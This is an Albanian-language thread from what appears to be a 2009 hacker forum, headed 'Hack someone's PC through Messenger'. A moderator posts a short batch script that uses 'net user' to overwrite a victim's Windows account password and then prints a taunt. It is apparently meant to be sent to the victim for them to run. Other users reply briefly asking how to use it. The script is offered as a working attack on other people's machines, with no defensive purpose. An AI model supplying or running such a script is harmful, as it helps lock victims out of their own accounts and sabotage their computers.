Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Hacko pc e dikujna permes messengerit ( 2oo9 )

Shko poshtë 
AutoriMesazh
Gjergjinho_St
Moderator
Moderator


Numri i postimeve : 226
Poenat e Antarit : 809
Thanks : 1
Join date : 24/05/2009
Age : 25
Location : St' City-Kosova

MesazhTitulli: Hacko pc e dikujna permes messengerit ( 2oo9 )   Tue Jun 09, 2009 3:30 pm

kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani


Kodi:
1:@echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "Say Good Bay To The Bad Gay "
4:Pause
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.denica-hg.tk
bLeenndoo.xX
Moderator
Moderator
avatar

Numri i postimeve : 515
Poenat e Antarit : 1428
Thanks : 3
Join date : 28/05/2009
Age : 22
Location : Kosova,Vushtrri

MesazhTitulli: Re: Hacko pc e dikujna permes messengerit ( 2oo9 )   Wed Jun 10, 2009 9:24 pm

halee se kom provu broo Very Happy spo di kujna me ja bo kit senn
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.blendos.albanianforum.net
KAPITEN|
Super Moderator
Super Moderator
avatar

Numri i postimeve : 451
Poenat e Antarit : 1284
Thanks : 3
Join date : 04/06/2009
Age : 23
Location : Fushë Kosova

MesazhTitulli: Re: Hacko pc e dikujna permes messengerit ( 2oo9 )   Thu Jun 11, 2009 10:56 am

Po masi te shenojsh qka duhet me bo !!!
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
Gjergjinho_St
Moderator
Moderator


Numri i postimeve : 226
Poenat e Antarit : 809
Thanks : 1
Join date : 24/05/2009
Age : 25
Location : St' City-Kosova

MesazhTitulli: hei   Thu Jun 11, 2009 7:55 pm

heii i ki kater opcione (4)... edhe u kry.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.denica-hg.tk
Sponsored content
MesazhTitulli: Re: Hacko pc e dikujna permes messengerit ( 2oo9 )   

Mbrapsht në krye Shko poshtë
 
Hacko pc e dikujna permes messengerit ( 2oo9 )
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: